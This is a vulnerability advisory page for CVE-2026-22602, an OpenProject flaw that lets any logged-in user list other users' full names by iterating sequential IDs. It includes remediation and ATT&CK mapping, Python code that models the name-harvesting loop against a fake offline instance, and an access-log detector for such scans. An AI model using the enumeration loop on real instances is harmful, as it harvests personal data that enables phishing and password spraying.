CVE-2026-22602 in openproject
Summary
by MITRE • 01/10/2026
OpenProject is an open-source, web-based project management software. Prior to version 16.6.2, a low‑privileged logged-in user can view the full names of other users. Since user IDs are assigned sequentially and predictably (e.g., 1 to 1000), an attacker can extract a complete list of all users’ full names by iterating through these URLs. The same behavior can also be reproduced via the OpenProject API, allowing automated retrieval of full names through the API as well. This issue has been patched in version 16.6.2. Those who are unable to upgrade may apply the patch manually.
Analysis
by VulDB Data Team • 01/11/2026
CVE-2026-22602 affects OpenProject, an open-source, web-based project management platform, in all versions before 16.6.2. It is an information disclosure issue: any authenticated user, regardless of role or project membership, can retrieve the full name of any other account on the instance. The MITRE description names only the full name as the exposed field; it does not say that other profile data is reachable. The root cause is a missing authorization check on the user detail view, which should limit visibility to users the requester is entitled to see (for example, members of shared projects). Because user IDs are assigned sequentially, that missing check turns into complete enumeration rather than an occasional leak.
Exploitation requires nothing beyond a valid low-privileged login. User IDs in OpenProject are sequential database keys, so an attacker simply walks the ID space (the description gives 1 to 1000 as an example range, not a fixed bound) and records the name returned for each ID that exists. Sequential IDs are normal in Rails applications and are not a defect on their own; the weakness is that the user detail page and the corresponding API endpoint answer for IDs the requester has no relationship to. The same behaviour is reproducible through the OpenProject API, so the harvest can be scripted: one request per ID, with deleted accounts showing up as gaps rather than as a stop condition.
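The iteration described above, as an added example that is not OpenProject code and not a published exploit script. The HTTP transport is injected so the logic runs offline against a constructed fake instance; the path /api/v3/users/{id} and the `name` field are assumed from the public API shape and should be confirmed against a real instance. The `hardened_fetch` fake is a generic authorization pattern for contrast, not a description of what the 16.6.2 patch actually changes.

```python
"""Model of sequential user-ID enumeration against a users endpoint.

Added example: not OpenProject's code. Everything below runs offline
against a constructed fake; the endpoint path and JSON shape are assumptions.
"""
import json
from typing import Callable, Dict, Set, Tuple

Fetch = Callable[[str], Tuple[int, str]]  # path -> (HTTP status, response body)

# Constructed fake instance. Missing ids model deleted users; the instance
# is small, so a blind 1..1000 walk would mostly see 404s.
FAKE_USERS: Dict[int, Dict[str, object]] = {
    1: {"id": 1, "name": "OpenProject Admin", "login": "admin"},
    2: {"id": 2, "name": "Alice Example", "login": "alice"},
    3: {"id": 3, "name": "Bob Example", "login": "bob"},
    5: {"id": 5, "name": "Carol Example", "login": "carol"},
}

# Assumption for the hardened fake: ids the requester shares a project with.
VISIBLE_TO_REQUESTER: Set[int] = {2, 3}

PREFIX = "/api/v3/users/"


def _user_id(path: str):
    """Extract the numeric id from /api/v3/users/<id>, or None."""
    if path.startswith(PREFIX) and path[len(PREFIX):].isdigit():
        return int(path[len(PREFIX):])
    return None


def vulnerable_fetch(path: str) -> Tuple[int, str]:
    """Behaves like an unpatched instance for any logged-in user:
    every existing id is readable, regardless of shared projects."""
    uid = _user_id(path)
    if uid in FAKE_USERS:
        return 200, json.dumps({"_type": "User", **FAKE_USERS[uid]})
    return 404, json.dumps({"_type": "Error", "message": "not found"})


def hardened_fetch(path: str) -> Tuple[int, str]:
    """Generic authorization check (illustrative, not the vendor's fix):
    answer 404 for users the requester may not see, so a scan cannot even
    confirm that the id exists."""
    uid = _user_id(path)
    if uid in FAKE_USERS and uid in VISIBLE_TO_REQUESTER:
        return 200, json.dumps({"_type": "User", **FAKE_USERS[uid]})
    return 404, json.dumps({"_type": "Error", "message": "not found"})


def harvest_names(fetch: Fetch, start: int = 1, stop: int = 1000,
                  max_consecutive_misses: int = 50) -> Tuple[Dict[int, str], int]:
    """Walk ids start..stop and collect id -> full name.

    Tolerates gaps (deleted users) but stops after max_consecutive_misses
    non-200 responses in a row, so the scan ends shortly after the id space
    does. Returns the collected names and the number of requests issued.
    """
    names: Dict[int, str] = {}
    misses = 0
    requests = 0
    for uid in range(start, stop + 1):
        status, body = fetch(f"{PREFIX}{uid}")
        requests += 1
        if status == 200:
            misses = 0
            names[uid] = str(json.loads(body).get("name", ""))
        else:
            misses += 1
            if misses >= max_consecutive_misses:
                break
    return names, requests


if __name__ == "__main__":
    for label, fetch in (("vulnerable", vulnerable_fetch), ("hardened", hardened_fetch)):
        found, n = harvest_names(fetch)
        print(f"{label}: {len(found)} names in {n} requests: {found}")
```

Against the unpatched fake the walk returns every account (four names in 55 requests, since the 50-miss cutoff fires after the last real id); against the hardened fake it returns only the two users the requester shares a project with, and the attacker cannot tell a hidden user from a deleted one.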
The operational impact goes beyond the loss of one data field. A complete list of real names for everyone on an instance is reconnaissance material: it lets an attacker derive likely login names and e-mail addresses from the organisation's naming convention, seed credential stuffing and password spraying, and write targeted phishing that references real colleagues. On a self-hosted instance the list may include contractors and external parties, exposing organisational structure that was never meant to be visible across project boundaries. Full names are personal data, so organisations subject to data protection regulation may also have to treat a confirmed harvest as a reportable disclosure. At the design level the bug is an authorization failure: a user can read records outside the scope their role and project memberships grant.
Security practitioners should map this issue to CWE-200 (Exposure of Sensitive Information to an Unauthorized Actor), with CWE-862 (Missing Authorization) describing the underlying cause more precisely than "predictable identifiers" does. In ATT&CK terms the enumeration supports T1087 (Account Discovery; note that the .001 Local Account sub-technique refers to operating-system accounts, and there is no exact sub-technique for an application's user directory) and T1589.003 (Gather Victim Identity Information: Employee Names), with T1566 (Phishing) as the typical follow-on. Remediation is to upgrade to OpenProject 16.6.2; the vendor states that installations unable to upgrade can apply the fix manually as a patch, which should be done by someone familiar with the application's codebase and tested before deployment. The advisory does not describe the mechanics of the fix, so do not assume that user IDs become non-sequential; verify the fix directly by logging in as a low-privileged account with no shared projects and confirming that the user detail URL and the API endpoint for an unrelated user no longer return that user's name. Until the fix is in place, a burst of requests to user detail URLs with increasing IDs from one client is the signature to watch for in access logs.
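Detection logic for the log signature mentioned above, as an added example that is not part of the original analysis or OpenProject's code. It assumes the reverse proxy in front of OpenProject writes Combined Log Format lines and that user detail pages live at /users/<id> and /api/v3/users/<id>; the log lines are constructed sample data, not a real capture.

```python
"""Flag sequential user-ID enumeration in web server access logs.

Added example, not OpenProject code. Assumes Combined Log Format and the
URL patterns /users/<id> and /api/v3/users/<id>. All log lines below are
constructed sample data.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
# Web profile URL and v3 API URL; trailing subpaths and query strings ignored.
USER_PATH_RE = re.compile(r'^/(?:api/v3/)?users/(?P<id>\d+)(?:[/?].*)?$')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def _line(ip: str, second: int, path: str, status: int) -> str:
    """Build one constructed Combined Log Format line (sample data)."""
    ts = (datetime(2026, 1, 10, 12, 0, 0) + timedelta(seconds=second)).strftime("%d/%b/%Y:%H:%M:%S")
    return f'{ip} - - [{ts} +0000] "GET {path} HTTP/1.1" {status} 512 "-" "curl/8.5.0"'


# Constructed sample: one client walks ids 1..25 one per second (ids 4 and 9
# are deleted and answer 404); a normal user browses a couple of profiles.
SAMPLE_LINES: List[str] = (
    [_line("203.0.113.7", i, f"/api/v3/users/{i}", 404 if i in (4, 9) else 200) for i in range(1, 26)]
    + [
        _line("198.51.100.4", 3, "/users/42", 200),
        _line("198.51.100.4", 8, "/projects/demo/work_packages", 200),
        _line("198.51.100.4", 15, "/users/42", 200),
        _line("198.51.100.4", 20, "/api/v3/users/17", 200),
    ]
)


def user_requests_by_ip(lines: List[str]) -> Dict[str, List[Tuple[datetime, int, int]]]:
    """Group (timestamp, user_id, status) per client for user-detail requests, time-ordered."""
    by_ip: Dict[str, List[Tuple[datetime, int, int]]] = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        p = USER_PATH_RE.match(m.group("path"))
        if not p:
            continue
        ts = datetime.strptime(m.group("ts"), TS_FMT)
        by_ip[m.group("ip")].append((ts, int(p.group("id")), int(m.group("status"))))
    for reqs in by_ip.values():
        reqs.sort()
    return by_ip


def enumeration_score(reqs: List[Tuple[datetime, int, int]]) -> Tuple[int, float, float]:
    """Return (distinct ids, fraction of steps where the id rises by exactly 1, span in seconds)."""
    ids = [uid for _, uid, _ in reqs]
    distinct = len(set(ids))
    steps = [b - a for a, b in zip(ids, ids[1:])]
    seq_ratio = sum(1 for s in steps if s == 1) / len(steps) if steps else 0.0
    span = (reqs[-1][0] - reqs[0][0]).total_seconds() if reqs else 0.0
    return distinct, seq_ratio, span


def flag_enumeration(lines: List[str], min_distinct: int = 20, min_seq_ratio: float = 0.8,
                     max_span_seconds: float = 600.0) -> Dict[str, Dict[str, float]]:
    """Clients that touched many distinct user ids, mostly in +1 steps, within the window.
    404s are counted too: a scan walks deleted ids that real users never request."""
    flagged: Dict[str, Dict[str, float]] = {}
    for ip, reqs in user_requests_by_ip(lines).items():
        distinct, ratio, span = enumeration_score(reqs)
        if distinct >= min_distinct and ratio >= min_seq_ratio and span <= max_span_seconds:
            flagged[ip] = {
                "distinct_ids": distinct,
                "sequential_ratio": round(ratio, 2),
                "span_seconds": span,
                "not_found": sum(1 for _, _, st in reqs if st == 404),
            }
    return flagged


if __name__ == "__main__":
    for ip, stats in flag_enumeration(SAMPLE_LINES).items():
        print(f"possible user enumeration from {ip}: {stats}")
```

On the sample the scanner is flagged with 25 distinct ids, a sequential ratio of 1.0 and two 404s in a 24-second span, while the ordinary user (two distinct ids, no +1 steps) is not. The thresholds are starting points; tune `min_distinct` to the size of the instance, and in production key on the authenticated session or API token rather than the source IP where the proxy logs it.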